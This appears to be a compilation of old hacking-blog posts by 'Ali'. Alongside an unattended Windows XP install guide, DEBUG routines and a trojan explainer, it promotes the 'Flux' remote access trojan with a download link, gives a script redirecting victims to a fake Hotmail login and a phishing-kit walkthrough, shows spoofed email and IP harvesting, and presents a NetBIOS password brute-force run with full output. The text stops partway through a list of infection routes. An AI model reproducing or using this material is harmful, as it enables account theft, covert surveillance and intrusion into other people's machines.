Ali
You can create a CD that can install Windows XP automatically, putting in all the details and answering all the dialog boxes.




The secret behind this is the answer file, which tells Windows what to do while it's installing. The answer file can be created using Windows setup manager.



Using this tool, you can make the answer file so powerful that you can even tell Windows to include or exclude individual components, set the display resolution, and more.



Here's the Steps involved in creating XP Automated Installation Disc :









Step 1: To begin with, insert your Windows XP installation CD into the drive and copy the entire contents of the CD to a new folder on your hard disk.



Step 2: Navigate to the Support > Tools folder on the CD and double-click the Deploy.cab file. Copy all the files to a new folder on your hard disk.



Step 3: The crucial part begins now, creating the answer file. To execute the windows setup manager, double click the Setupmgr.exe file from the contents of the Deploy.cab, which you just copied onto the hard drive.



Step 4: The first few steps of the wizard are self explanatory. Select the following options from the successive dialog boxes. Create a new answer file; Windows unattended installation (Select the appropriate Windows version); "Fully automated"; "No this answer file will be used to install from CD"; and finally, accept the license agreement.



Step 5: Under the General Settings, you can customize the installation of Windows by providing the default name and organization, display settings, time zone and the product key. Fill in the fields using the drop-down list or by keying in the details. If you don't select an option from the drop-down list, the default values will be used.



Step 6: After you are done click Finish and save the answer file as "winnt.sif" when you are prompted. Advanced users can further tweak the answer file by referring to the Help file called Ref.chm in the same folder.



Step 7: Finally copy the answer file to i386 folder in the Windows XP installation folder you created in the beginning.



Step 8: To burn a bootable installation disc, you need the boot sector of the Windows XP CD. Download it from here bootfiles.zip



Step 9: Launch Nero and select CD-ROM (Boot) from the New Compilation dialog box. Under the Boot tab, specify the boot sector file you downloaded and extracted. Set the emulation as "No emulation", and keep the boot message blank. Most importantly, remember to set the "Number of loaded sectors" as 4.



Step 10: Under the Burn tab, set the write method to disc at-once. Click the New button to to begin adding files and folders to the compilation. Drag all the contents of the Windows XP installation disc that you copied to your hard drive (with the answer file in the i386 folder) into the left pane. Insert a blank CD into the optical drive and hit burn button. Your windows automated installation Disc is ready!
Ali
This is the first release of a remote administration tool named Flux.


This application allows you to administer a remote computer, capable of bypassing a router or

protected by a firewall.



Features:

- FWBP+ (can inject to default browser, msn messenger or up to three specified applications)

- Persistent server (server is hard to remove, it will be rerun when closed,

rewritten when deleted, readded to registry when removed)

- Startup method: Registry run + ActiveX + Flux-special.

- Installs to windows or system directory.

- Up to three specified ports in client can listen for connections.

- Up to three specified IPs can be used for connection

- Up to three specified URLs can be used to connection on

- File manager (uses caches to speed up browsing, supports download resuming)

- Screen capture, uses either jpeg-compression or diff. calculation

to stream users desktop (both included in basic server)

- Cam capture (opt. to save caps)

- Keylogger (opt. to log in background)

- Passwordsniffer (logs all text entered into password/***-boxes)

- Find files

- Task list (can capture a certain window or control)

- Process list

- SOCKS4

- Show message box

- Execution file from URL

- Connection is encrypted with a 1024-bit key
 
Download


Add-on
Ali
Hack....................................


Boot anyone's xp computer who has a limited account active (i.e. guest) When you boot, boot to safe mode w/ dos prompt. (push F8 during startup) Type



C:\cd windows\system 32



(for a nice matrix touch, I would also type this)



color 0a



While still in system32 type:



command userpasswords2



Then unselect the box that says "this computer requires a password etc."

Reboot!



Congrats- You just hacked XP
Ali
Debug has been included in every version of MS-DOS as well as Windows. When running any of the debug routines it is recommended that if you have Windows that you exit or shut down to get into a real DOS prompt (unless you're running Windows ME, Windows 2000, Windows XP, or later versions).




Once at the MS- DOS prompt, run through the below example, this example is perfectly fine to run on any PC Computer running MS-DOS / Windows and will not harm anything.

Type debug and press enter.

This should get you to a - (small dash). This is the debug prompt.

At the - type d40:00 and press enter; this will return several lines of information.

After the feedback you will be back to the debug prompt.

To exit out of debug type q and press enter. This will return you back to the MS-DOS prompt.



In some of the below debug routines you will notice that a "g" is typed, then "q". G tells the computer that the code type is not self executing and must be run at this point. If completed, the program will return Program Terminated Normally which indicates you can now quit from the debug program.
Ali
The below debug routine will check the ports of the computer to allow you to know if ports are being detected or not. Type debug to get to the "-" Type D40:0


You should get several lines; however, the first line is the only important line, which should read the following:

0040:0000 F8 03 F8 02 E8 03 E8 02 - 78 03 78 02 BC 03

F8 03

F8 02

E8 03

E8 02





78 03

78 02

BC 03



COM1

COM2

COM3

COM4



LPT1

LPT2

LPT3



The above graph shows you what the feed back means as far as port, so if you see F8 03, this would be an indication that COM1 is being detected; if you see 00 00, this is an indication that it is not being detected, which could mean that hardware is bad or that it is disabled inCMOS

Once you have finished looking at the information, type Q and press enter to get out of Debug.
Ali
Hacking Hotmail


Introduction



We all use Hotmail!!!well its one of my Favorites.

Here m going to reveal n Alert About how the Unethical Hackers Can cheat us.



This Page is meant for Educational Purpose only. I do not Endorse Hacking at all but its Meant for knowing the Threats n Protect yourself also Curbing them

Topics



1:- How hotmail can be hacked with fake login screen (2 different ways)

2:- Fake e-mails threats

3:- Detect a fake message into hotmail

4:- How to get persons ip address through msn messenger

5:- curbing the way hackers get the passwords

6:- Easiest Way

7:- Change msn messenger title

8:- Protect yourself from Virus

9:- Hoax Toolbox v1.1

1) Protect yourself from Phishing

Usually The Unethical Hackers Upload their hotmail's fake login screen on a web server and then send these codes

to the victim from yahoo or another mail sending program. The codes are



< script>

location.href="http://www.yoursite.com/yourhotmailfakepage.html\/"

< /script>



and the user will be automatically redirected to your fake hotmail screen from their e-mail box & you r Hacked.

Beware of There Threats



2) Beware of Fake Login Screens



They Start chatting with your victim and send him the fake login screen through Their messenger and try to pish you.

there are many many of them available on the net.. which are usually small Visual Basic programs.. never reveal your password anywhere other than the latest Versions of msn Messengers.

3) Fake e-mails threats

This is very easy go to http://www.boxfrog.com/ register( its blocked now) but there are many others .. google u ll find many click on create message and in from filed type in any ones e-mail address and the message will be sent.

there's also a simple way of doing this by Telnet ting from the dos Prompt.

Beware of this Threat .. make your spam protection Powerful

4) Detect a fake message into Hotmail inbox

This is Simple Buddies.. open your e-mail box go to options select display setting or message display setting or (some thing like this) now select full where it says message display settings or something like this. Open the mail which u thought to be fake now in the last where it says from u can see the address of that site from where the mail is sent but if some one has sent it through some sort of program it will tell u his ip. n once you know D ip m sure u know how to go between it there after

IMP: Read the ip address log from Backwards.

5) Protect urself revealing your ip address through msn messenger

When you Open your messenger start chatting with friend open ms dos and type netstat -n there do not press enter and then minimize it after this send something to your victim and as soon as he accept it the hotmail messenger will say connecting this is the time when u re maximize your MS-DOS and

press enter the ip address next to time wait: will the friends ip. U may be Hacked The same way



Beware!!

HoaX Toolbox v1.1

This is a PHP script that creates a website with an admin area that allows the user to choose between fake login pages of MSN Messenger, Hotmail, Yahoo and Google Mail, once you set up the script on a server that has PHP and SQL you will be able to log in the administration page and choose the fake login page to display to the main site, when the victim tries to log-in their mail/messenger, the website keeps the user/pass information in a log file that you can view anytime from the admin area, if the victim is not stupid enough to add their real log-in because they read the URL of your server instead of reading hotmail.com or yahoo.com in the URL bar then remember you can pop-up the main page of the site and disable the URL bar on the explorer, so when the user clicks on your real site the link "Yahoo Mail" an explorer without URL bar pops up, if you don't know how to pop up customized browsers search google





Hacking MSN

Small yet working trick

Hacking MSN is actually VERY simple. Msn is designed to route the connection through a Microsoft server while you are chatting. However, when a file is sent, a DCC (direct connection) is created. This was purposely done because otherwise Microsoft would waste a lot of bandwidth so a direct connection is made. This is your chance. Make a file transfer occur between u and a victim (try to send a big file), open up your command prompt (run "cmd" in NT/XP or "command" in 9X to get into prompt) and run netstat. usually the MSN targets IP would be above port 2000. enjoy.

If u receive some crap like gux1-43.primus.com as the target, do a reverse DNS lookup on it. However, this occurs very rarely, mostly u will receive a clear IP.



Once u have d IP u can do anything with him by Fingerprinting.



U can protect yourself from this occurring to you by using a proxy with MSN (under connections panel in options).
Ali
NetBIOS Hacking


This is for an Educational purpose only



All viewers please keep in mind one thing that all this information her is given for informational purpose so please dnt misuse of your knowledge

NetBIOS Attack MethodsThis NetBIOS attack technique was verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta 2.1. One of the components being used is NAT.EXEA discussion of the tool, it switches, and common techniques follows:

NAT.EXE [-o filename] [-u userlist] [-p passlist]



Switches:



-o Specify the output file. All results from the scan

will be written to the specified file, in addition

to standard output.

-u Specify the file to read usernames from. Usernames

will be read from the specified file when attempt-

ing to guess the password on the remote server.

Usernames should appear one per line in the specified file.

-p Specify the file to read passwords from. Passwords

will be read from the specified file when attempting to guess the password on the remote server.

Passwords should appear one per line in the specified file.



Addresses should be specified in comma deliminated

format, with no spaces. Valid address specifications include:

hostname - "hostname" is added

127.0.0.1-127.0.0.3, adds addresses 127.0.0.1

through 127.0.0.3

127.0.0.1-3, adds addresses 127.0.0.1 through

127.0.0.3

127.0.0.1-3,7,10-20, adds addresses 127.0.0.1

through 127.0.0.3, 127.0.0.7, 127.0.0.10 through

127.0.0.20.

hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1

through 127.0.0.1

All combinations of hostnames and address ranges as

specified above are valid.



[8.0.1] Comparing NAT.EXE to Microsoft's own executables

[8.0.2] First, a look at NBTSTAT



First we look at the NBTSTAT command. This command was discussed in earlier portions of the book ( [5.0.6] The Nbtstat Command ). In this section, you will see a demonstration of how this tool is used and how it compares to other Microsoft tools and non Microsoft tools.



What follows is pretty much a step by step guide to using NBTSTAT as well as extra information. Again, if youre interested in more NBSTAT switches and functions, view the [5.0.6] The Nbtstat Command portion of the book.



C:\nbtstat -A XXX.XX.XXX.XX

NetBIOS Remote Machine Name Table

Name Type Status

---------------------------------------------

STUDENT1 <20> UNIQUE Registered

STUDENT1 <00> UNIQUE Registered

DOMAIN1 <00> GROUP Registered

DOMAIN1 <1C> GROUP Registered

DOMAIN1 <1B> UNIQUE Registered

STUDENT1 <03> UNIQUE Registered

DOMAIN1 <1E> GROUP Registered

DOMAIN1 <1D> UNIQUE Registered

..__MSBROWSE__.<01> GROUP Registered



MAC Address = 00-C0-4F-C4-8C-9D



Here is a partial NetBIOS 16th bit listing:



Computername <00> UNIQUE workstation service name

<00> GROUP domain name

Server <20> UNIQUE Server Service name



Computername <03> UNIQUE Registered by the messenger service. This is the computername

to be added to the LMHOSTS file which is not necessary to use

NAT.EXE but is necessary if you would like to view the remote

computer in Network Neighborhood.

Username <03> Registered by the messenger service.

Domainname <1B> Registers the local computer as the master browser for the domain

Domainname <1C> Registers the computer as a domain controller for the domain

(PDC or BDC)

Domainname <1D> Registers the local client as the local segments master browser

for the domain

Domainname <1E> Registers as a Group NetBIOS Name

Network Monitor Name

Network Monitor Agent

<06> RAS Server

<1F> Net DDE

<21> RAS Client





[8.0.3] Intro to the NET commands

The NET command is a command that admins can execute through a dos window to show information about servers, networks, shares, and connections. It also has a number of command options that you can use to add user accounts and groups, change domain settings, and configure shares. In this section, you will learn about these NET commands, and you will also have the outline to a NET command Batch file that can be used as a primitive network security analysis tool. Before we continue on with the techniques, a discussion of the available options will come first:



[8.0.4] Net Accounts: This command shows current settings for password, logon limitations, and domain information. It also contains options for updating the User accounts database and modifying password and logon requirements.

[8.0.5] Net Computer: This adds or deletes computers from a domains database.

[8.0.6] Net Config Server or Net Config Workstation: Displays config info about the server service. When used without specifying Server or Workstation, the command displays a list of configurable services.

[8.0.7] Net Continue: Reactivates an NT service that was suspended by a NET PAUSE command.

[8.0.8] Net File: This command lists the open files on a server and has options for closing shared files and removing file locks.

[8.0.9] Net Group: This displays information about group names and has options you can use to add or modify global groups on servers.

[8.1.0] Net Help: Help with these commands

[8.1.1] Net Helpmsg message#: Get help with a particular net error or function message.

[8.1.2] Net Localgroup: Use this to list local groups on servers. You can also modify those groups.

[8.1.3] Net Name: This command shows the names of computers and users to which messages are sent on the computer.

[8.1.4] Net Pause: Use this command to suspend a certain NT service.

[8.1.5] Net Print: Displays print jobs and shared queues.

[8.1.6] Net Send: Use this command to send messages to other users, computers, or messaging names on the network.

[8.1.7] Net Session: Shows information about current sessions. Also has commands for disconnecting certain sessions.

[8.1.8] Net Share: Use this command to list information about all resources being shared on a computer. This command is also used to create network shares.

[8.1.9] Net Statistics Server or Workstation: Shows the statistics log.

[8.2.0] Net Stop: Stops NT services, cancelling any connections the service is using. Let it be known that stopping one service, may stop other services.

[8.2.1] Net Time: This command is used to display or set the time for a computer or domain.

[8.2.2] Net Use: This displays a list of connected computers and has options for connecting to and disconnecting from shared resources.

[8.2.3] Net User: This command will display a list of user accounts for the computer, and has options for creating a modifying those accounts.

[8.2.4] Net View: This command displays a list of resources being shared on a computer. Including netware servers.

[8.2.5] Special note on DOS and older Windows Machines: The commands listed above are available to Windows NT Servers and Workstation, DOS and older Windows clients have these NET commands available:



Net Config

Net Diag (runs the diagnostic program)

Net Help

Net Init (loads protocol and network adapter drivers.)

Net Logoff

Net Logon

Net Password (changes password)

Net Print

Net Start

Net Stop

Net Time

Net Use

Net Ver (displays the type and version of the network redirector)

Net View



For this section, the command being used is the NET VIEW and NET USE commands.



[8.2.6] Actual NET VIEW and NET USE Screen Captures during a hack.

C:\net view XXX.XX.XXX.XX

Shared resources at XXX.XX.XXX.XX

Share name Type Used as Comment

------------------------------------------------------------------------------

NETLOGON Disk Logon server share

Test Disk

The command completed successfully.



NOTE: The C$ ADMIN$ and IPC$ are hidden and are not shown.



C:\net use /?

The syntax of this command is:



NET USE [devicename
*] [\\computername\sharename[\volume] [password
*]]

[/USER:[domainname\]username]

[[/DELETE]
[/PERSISTENT:{YES
NO}]]



NET USE [devicename
*] [password
*]] [/HOME]



NET USE [/PERSISTENT:{YES
NO}]



C:\net use x: \\XXX.XX.XXX.XX\test



The command completed successfully.

C:\unzipped\nat10bin>net use

New connections will be remembered.

Status Local Remote Network

-------------------------------------------------------------------------------

OK X: \\XXX.XX.XXX.XX\test Microsoft Windows Network

OK \\XXX.XX.XXX.XX\test Microsoft Windows Network





The command completed successfully.

Here is an actual example of how the NAT.EXE program is used. The information listed here is an actual capture of the activity. The IP addresses have been changed to protect, well, us.

C:\nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY



[*]--- Reading usernames from userlist.txt

[*]--- Reading passwords from passlist.txt



[*]--- Checking host: XXX.XX.XXX.XX

[*]--- Obtaining list of remote NetBIOS names



[*]--- Attempting to connect with name: *

[*]--- Unable to connect



[*]--- Attempting to connect with name: *SMBSERVER

[*]--- CONNECTED with name: *SMBSERVER

[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03

[*]--- Server time is Mon Dec 01 07:44:34 1997

[*]--- Timezone is UTC-6.0

[*]--- Remote server wants us to encrypt, telling it not to



[*]--- Attempting to connect with name: *SMBSERVER

[*]--- CONNECTED with name: *SMBSERVER

[*]--- Attempting to establish session

[*]--- Was not able to establish session with no password

[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'

[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'

[*]--- Obtained server information:

Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]

[*]--- Obtained listing of shares:



Sharename Type Comment

--------- ---- -------

ADMIN$ Disk: Remote Admin

C$ Disk: Default share

IPC$ IPC: Remote IPC

NETLOGON Disk: Logon server share

Test Disk:



[*]--- This machine has a browse list:

Server Comment

--------- -------

STUDENT1



[*]--- Attempting to access share: \\*SMBSERVER\

[*]--- Unable to access



[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$

[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$

[*]--- Checking write access in: \\*SMBSERVER\ADMIN$

[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$

[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$



[*]--- Attempting to access share: \\*SMBSERVER\C$

[*]--- WARNING: Able to access share: \\*SMBSERVER\C$

[*]--- Checking write access in: \\*SMBSERVER\C$

[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$

[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$



[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON

[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON

[*]--- Checking write access in: \\*SMBSERVER\NETLOGON

[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON



[*]--- Attempting to access share: \\*SMBSERVER\Test

[*]--- WARNING: Able to access share: \\*SMBSERVER\Test

[*]--- Checking write access in: \\*SMBSERVER\Test

[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test



[*]--- Attempting to access share: \\*SMBSERVER\D$

[*]--- Unable to access



[*]--- Attempting to access share: \\*SMBSERVER\ROOT

[*]--- Unable to access



[*]--- Attempting to access share: \\*SMBSERVER\WINNT$

[*]--- Unable to access



If the default share of Everyone/Full Control is active, then you are done, the server is hacked. If not, keep playing. You will be surprised what you find out.
Ali
Trojans all explained here


Trojan ( bad ) Beware !!



Trojan horse well this term has many meanings .

In the context of computer software, a Trojan horse is a malicious program that is disguised as or embedded within legitimate software. The term is derived from the classical myth of the Trojan Horse. They may look useful or interesting (or at the very least harmless) to an unsuspecting user, but are actually harmful when executed.



Often the term is shortened to simply Trojan, even though this turns the adjective into a noun, reversing the myth (Greeks were gaining malicious access, not Trojans).

There are two common types of Trojan horses.



One, is otherwise useful software that has been corrupted by a cracker inserting malicious code that executes while the program is used. Examples include various implementations of weather alerting programs, computer clock setting software, and peer to peer file sharing utilities.



The other type is a standalone program that masquerades as something else, like a game or image file, in order to trick the user into some misdirected complicity that is needed to carry out the program's objectives.



Trojan horse programs cannot operate autonomously, in contrast to some other types of malware, like viruses or worms. Just as the Greeks needed the Trojans to bring the horse inside for their plan to work, Trojan horse programs depend on actions by the intended victims. As such, if trojans replicate and even distribute themselves, each new victim must run the program/trojan. Therefore their virulence is of a different nature, depending on successful implementation of social engineering concepts rather than flaws in a computer system's security design or configuration. Definition



A Trojan horse program has a useful and desired function, or at least it has the appearance of having such. Trojans use false and fake names to trick users into dismissing the processes. These strategies are often collectively termed social engineering. In most cases the program performs other, undesired functions, but not always. The useful, or seemingly useful, functions serve as camouflage for these undesired functions. A trojan is designed to operate with functions unknown to the victim. The kind of undesired functions are not part of the definition of a Trojan Horse; they can be of any kind, but typically they have malicious intent.



In practice, Trojan Horses in the wild often contain spying functions (such as a packet sniffer) or backdoor functions that allow a computer, unknown to the owner, to be remotely controlled from the network, creating a "zombie computer". The Sony/BMG rootkit Trojan, distributed on millions of music CDs through 2005, did both of these things. Because Trojan horses often have these harmful behaviors, there often arises the misunderstanding that such functions define a Trojan Horse.



In the context of Computer Security, the term 'Trojan horse' was first used in a seminal report edited/written by JP Anderson (aka 'The Anderson Report' (Computer Security Technology Planning, Technical Report ESD-TR-73-51, USAF Electronic Sysstem Division, Hanscom AFB, Oct, 1972), which credits Daniel J Edwards then of NSA for both the coinage and the concept. One of the earliest known Trojans was a binary Trojan distributed in the binary Multics distribution; it was described by PA Karger and RR Schell in 1974 (Multics Security Evaluation, Technical Report ESD-TR-74-193 vol II, HQ Electronic Systems Division, Hanscom AFB, June 1974).



The basic difference from computer viruses is that a Trojan horse is technically a normal computer program and does not possess the means to spread itself. The earliest known Trojan horses were not designed to spread themselves. They relied on fooling people to allow the program to perform actions that they would otherwise not have voluntarily performed.



Trojans implementing backdoors typically setup a hidden server, from which a hacker with a client can then log on to. They have become polymorphic, process injecting, prevention disabling, easy to use without authorization, and therefore are abusive.



Trojans of recent times also come as computer worm payloads. It is important to note that the defining characteristics of Trojans are that they require some user interaction, and cannot function entirely on their own nor do they self-propagate/replicate.



Examples



Example of a simple Trojan horse



A simple example of a trojan horse would be a program named "waterfalls.scr.exe" claiming to be a free waterfall screensaver which, when run, instead begins erasing all the files on the computer.



Example of a somewhat advanced Trojan horse



On the Microsoft Windows platform, an attacker might attach a Trojan horse with an innocent-looking filename to an email message which entices the recipient into opening the file. The Trojan horse itself would typically be a Windows executable program file, and thus must have an executable filename extension such as .exe, .com, .scr, .bat, or .pif. Since Windows is sometimes configured by default to hide filename extensions from a user, the Trojan horse is an extension that might be "masked" by giving it a name such as 'Readme.txt.exe'. With file extensions hidden, the user would only see 'Readme.txt' and could mistake it for a harmless text file. Icons can also be chosen to imitate the icon associated with a different and benign program, or file type.



When the recipient double-clicks on the attachment, the Trojan horse might superficially do what the user expects it to do (open a text file, for example), so as to keep the victim unaware of its real, concealed, objectives. Meanwhile, it might discreetly modify or delete files, change the configuration of the computer, or even use the computer as a base from which to attack local or other networks - possibly joining many other similarly infected computers as part of a distributed denial-of-service attack. The Sony/BMG rootkit mentioned above both installed a vulnerability on victim computers, but also acted as spyware, reporting back to a central server from time to time, when any of the music CDs carrying it were played on a Windows computer system.



Types of Trojan horses



Trojan horses are almost always designed to do various harmful things, but could be harmless. Examples are

erasing or overwriting data on a computer.

encrypting files in a cryptoviral extortion attack.

corrupting files in a subtle way.

upload and download files.

allowing remote access to the victim's computer. This is called a RAT. (remote administration tool)

spreading other malware, such as viruses. In this case the Trojan horse is called a 'dropper' or 'vector'.

setting up networks of zombie computers in order to launch DDoS attacks or send spam.

spying on the user of a computer and covertly reporting data like browsing habits to other people (see the article on spyware).

make screenshots.

logging keystrokes to steal information such as passwords and credit card numbers (also known as a keylogger).

phish for bank or other account details, which can be used for criminal activities.

installing a backdoor on a computer system.

opening and closing CD-ROM tray



Time bombs and logic bombs



"Time bombs" and "logic bombs" are types of trojan horses.





"Time bombs" activate on particular dates and/or times. "Logic bombs" activate on certain conditions met by the computer.



Precautions against Trojan horses

Trojan horses can be protected against through end user awareness. Trojan Horse viruses can cause a great deal of damage to a personal computer but even more damaging is what they can do to a business, particularly a small business that usually does not have the same virus protection capabilities as a large business. Since a Trojan Horse virus is hidden it is harder to protect yourself or your company from them but there are things that you can do.



Trojan Horses are most commonly spread through an e-mail, much like other types of common viruses. The only difference being of course is that a Trojan Horse is hidden. The best ways to protect yourself and your company from Trojan Horses are as follows:

1. If you receive e-mail from someone that you do not know or you receive an unknown attachment never open it right away. As an e-mail use you should confirm the source. Some hackers have the ability to steal an address books so if you see e-mail from someone you know that does not necessarily make it safe.

2. When setting up your e-mail client make sure that you have the settings so that attachments do not open automatically. Some e-mail clients come ready with an anti-virus program that scans any attachments before they are opened. If your client does not come with this it would be best to purchase on or download one for free.

3. Make sure your computer has an anti-virus program on it and make sure you update it regularly. If you have an auto-update option included in your anti-virus program you should turn it on, that way if you forget to update your software you can still be protected from threats

4. Operating systems offer patches to protect their users from certain threats and viruses, including Trojan Horses. Software developers like Microsoft offer patches that in a sense “close the hole” that the Trojan horse or other virus would use to get through to your system. If you keep your system updated with these patches your computer is kept much safer.

5. Avoid using peer-2-peer or P2P sharing networks like Kazaa , Limewire, Ares, or Gnutella because those programs are generally unprotected from viruses and Trojan Horse viruses are especially easy to spread through these programs. Some of these programs do offer some virus protection but often they are not strong enough.

Besides these sensible precautions, one can also install anti-trojan software, some of which are offered free.



Methods of Infection



The majority of trojan horse infections occur because the user was tricked into running an infected program. This is why you're not supposed to open unexpected attachments on emails -- the program is often a cute animation or a sexy picture, but behind the scenes it infects the computer with a trojan or worm. The infected program doesn't have to arrive via email, though; it can be sent to you in an Instant Message, downloaded from a Web site or by FTP, or even delivered on a CD or floppy disk. (Physical delivery is uncommon, but if you were the specific target of an attack, it would be a fairly reliable way to infect your computer.) Furthermore, an infected program could come from someone who sits down at your computer and loads it manually.



Websites: You can be infected by visiting a rogue website. Internet Explorer is most often targeted by makers of trojans and other pests, because it contains numerous bugs, some of which improperly handle data (such as HTML or images) by executing it as a legitimate program. (Attackers who find such vulnerabilities can then specially craft a bit of malformed data so that it contains a valid program to do their bidding.) The more "features" a web browser has (for example ActiveX objects, and some older versions of Flash or Java), the higher your risk of having security holes that can be exploited by a trojan horse.



Email: If you use Microsoft Outlook, you're vulnerable to many of the same problems that Internet Explorer has, even if you don't use IE directly. The same vulnerabilities exist since Outlook allows email to contain HTML and images (and actually uses much of the same code to process these as Internet Explorer). Furthermore, an infected file can be included as an attachment. In some cases, an infected email will infect your system the moment it is opened in Outlook -- you don't even have to run the infected attachment.



For this reason, using Outlook lowers your security substantially.



Open ports: Computers running their own servers (HTTP, FTP, or SMTP, for example), allowing Windows file sharing, or running programs that provide filesharing capabilities such as Instant Messengers (AOL's AIM, MSN Messenger, etc.) may have vulnerabilities similar to those described above. These programs and services may open a network port giving attackers a means for interacting with these programs from anywhere on the Internet. Vulnerabilities allowing unauthorized remote entry are regularly found in such programs, so they should be avoided or properly secured.



A firewall may be used to limit access to open ports. Firewalls are widely used in practice, and they help to mitigate the problem of remote trojan insertion via open ports, but they are not a totally impenetrable solution, either.

More on trojans

Trojan Part 1

1.What is this text about?

/=-=-=-=-=-=-=-=-=-=-=-=-=-=/

In this text I'm going to explain you interesting things about

the trojans and about their future.I hope you'll realize that

trojans are dangerous and they're still big security problem although

many people say don't download files from the net and you won't get

infected which is not right.The main thing I want to explain here is

do the trojans have future and other interesting things about them.

This text is only for Windows based trojans not Unix one.

=-=-=-=-=-=-=-=-=-=-=-=-=-=

2.What Is A Trojan Horse?

/=-=-=-=-=-=-=-=-=-=-=-=-=/



A trojan horse is

-An unauthorized program contained within a legitimate program. This unauthorized

program performs functions unknown (and probably unwanted) by the user.





-A legitimate program that has been altered by the placement of

unauthorized code within it; this code performs functions unknown

(and probably unwanted) by the user.





-Any program that appears to perform a desirable and necessary

function but that (because of unauthorized code

within it that is unknown to the user) performs functions unknown

(and probably unwanted) by the user.



Trojans can also be called RAT's, or Remote Administration Tools.

The trojan got it's name from the old mythical story about how the greeks during

the war, gave their enemy a huge wooden horse as a gift.

They accepted this gift and they brought into their kingdom,

and during the night, greek soldiers crept out of the horse and attacked the city,

completely overcoming it.



3.Trojans Today

/=-=-=-=-=-=-=-=/

Trojans has always been big security problem even today.Most of the people

don't know what a trojan is and they keep downloading files from untrusted

sources or from suspicious people.Today there are more than 600 trojans on

the net that I know but I think there are many many more.Because every hacker or

programer today have it's own trojan made for his/her special needs and not

published anywhere.Every hacking group has also it's own trojans and programs.

When someone start learning winsock the first creating is chat client or trojan

horse.Even the anti-virus scanners I'll talk below people still get infected

by themselves,by some hacker or by some of your friends.

----------------------->



4.The Future Of Trojans

=-=-=-=-=-=-=-=-=-=-=-=-=

I think there're a lot of people out there that think the

trojans are outdated and they don't have future.Well I don't

think so.Trojans will always have future and new things added in

them.There are so many things that can be improved by skilled programers

in the trojans.



Trojans that COMPLETELY hide in the system and of course restart every time Windows is loaded

trojans that will lie every trojan and anti-virus program this is the future I think.

People that program trojans has a lot of ideas that makes their trojans unique.

These people start placing backdoors in ActiveX and who knows maybe in future they'll

find other sources they can place the trojans in.Programmers will always think of

new and unique trojans with functions never seen before.

Trojans are made every day by the programers with new options and with better encryption so

the Anti-Trojan software can't detect them.So noone knows how many are the trojans on the net.

But the programmers are still programming trojans and they will continue in the future.

Technically, a trojan could appear almost anywhere, on any operating system or platform.

However, with the exception of the inside job mentioned previously, the spread of trojans works

very much like the spread of viruses. Software downloaded from the Internet, especially shareware or freeware,

is always suspect. Similarly, materials downloaded from underground servers

or Usenet newsgroups are also candidates.There are thousand of programs with not checked source and new programs are appearing every day especially the freeware one so they can all be trojans.So be careful what you're downloading and from where you're downloading it. Always download software from the official page.

----------------------------->



5.Anti-Virus Scanners

/=-=-=-=-=-=-=-=-=-=-=-=/

People think that when they have a virus scanner with the latest virus definitions

they're secure on the net and they can't get infected with a trojan or noone can

have access to their computer.This is NOT right.The purpose of the anti-virus

scanners is to detect not trojans but viruses.But when trojans became popular

the scanners started adding also trojan definitions.These scanners just can't

find the trojans and analyze them that's why they're just detecting the common

and the well know from everyone trojans like Back Orifice and NetBus and also

several other.As I told they're around 600 trojans I know out there and the

anti-virus scanners are detecting just a LITTLE part of them.

These scanners are not firewalls that will stop someone that want to connect

to your computer or try to attack you as people think they are.So I hope that

you understand that the main purpose of these scanners is not to detect

trojans and protect you while you're online.

Most of the internet users know only Back Orifice and NetBus as trojans.

There are some specific tools out there that clean ONLY from these trojans.

Again people think that they're secure and protected from every trojan.

--------------------------->



6.How Can I get Infected?

/=-=-=-=-=-=-=-=-=-=-=-=-=-=/

Everyone ask this question and often people ask themselves how they got

infected.Also when someone ask them did they run some file send to them

by someone or downloaded from somewhere people always say they didn't

run anything or download some file but they did it.People just don't

pay attention to things they do online and that's why they forget

about the moment of the infection with the trojan.

You can get infected from many places and I'll try to explain

you these things here.



6.1 From ICQ

6.2 From IRC

6.3 From Attachment

6.4 Physical Access

6.5 Tricks-diskette



6.1 From ICQ

People think that they can't infect while they're talking via ICQ

but they just forget the moment when someone sends them a file.

Everyone knows how insecure ICQ is and that's why some people

are afraid of using it.



As you maybe know there's a bug in ICQ allowing you to send a .exe

file to someone but it will look as .bmp or .jpg or whatever you want

it to look like.This is very dangerous as you see and can get you in

trouble.The attacker will just change the icon of the file like

a BMP image,tell you it's a pic of him,rename it to photo.bmp

then you'll get it and of course before getting it you'll see that

it's .bmp and you're secure because the file is not executable.

Then you run it see the picture and you think there's nothing to

worry about but there is.



That's why most of the people say that they didn't run any files

because they know that they've run an image not executable.

A way to prevent this bug in ICQ is always to check the type of

the file before running it.It may has an BMP icon but if at the type

of the file is written executable I thin you know that it will be

mistake if you run that file.



6.2 From IRC



You can also get infected from IRC by receiving files from

untrusted sources.But I advice you always to be paranoid

and do not receive files from ANYONE even from your best

friend because someone may stolen his/her password

and infect you.Some people think that they can be 100% sure

that the other person is their friend when they ask him/her

something like a secret or something else that only he/she know

but as I told you be paranoid because someone may infect your friend

and just check his/her IRC logs and see what is this secret about or

learn other things.Be paranoid it's more secure as I say and do not

receive files from anyone on IRC or from somewhere else like

e-mail,ICQ or even your online friends.



6.3 From Attachment



The same thing goes about the e-mail attachments.NEVER run anything

even if it says you'll see hot porno or some passwords for server or

anything else.The best way to infect someone with a trojan is mass

e-mailing the server because there're new people on the net and

they'll of course get infected.This is the best way of infecting

as I said that's why it's preferred by the people that want to infect

the masses.



6.4 Physical Access



